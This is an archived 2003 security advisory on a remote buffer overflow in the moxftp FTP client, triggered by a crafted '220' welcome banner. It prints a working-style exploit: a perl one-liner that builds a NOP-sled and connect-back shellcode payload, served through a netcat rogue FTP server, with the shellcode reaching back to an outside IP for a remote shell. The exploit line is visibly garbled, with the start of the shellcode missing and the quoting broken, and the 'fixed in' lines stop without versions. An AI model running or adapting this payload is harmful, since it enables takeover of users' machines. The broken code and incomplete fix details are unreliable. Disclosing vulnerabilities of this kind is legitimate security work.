24th Feb 2003 [SBWID-6017]
moxftp remote overlfow
moxftp-2.2 shipping with the FreeBSD ports system as well as from
various webpages per 9/2-03 is vulnerable.
In Knud Erik Højgaard [[email protected]] advisory :
According to the vendor moxftp is a "Ftp shell under X Window System".
Insufficient bounds checking leads to execution of arbitrary code.
Upon parsing the '220 welcome to server' ftp banner a buffer can be
overrun, allowing us to execute our arbitrary code. The buffer may be
constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing
the nops and shellcode in the buffer before ebp seems to cause some
problems, luckily there's plenty of space after eip.
$ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 .
x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" . "\n"' > file
# nc -l -p 21 < file
This sets up a rogue server which will overflow the buffer, and execute
the shellcode. The shellcode is connect-back to 126.96.36.199 port
10000, replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
Upgrade to latest patched version.
For the stable distribution (woody) this problem has been fixed in
For the old stable distribution (potato) this problem has been fixed in
For the unstable distribution (sid) this problem has been fixed in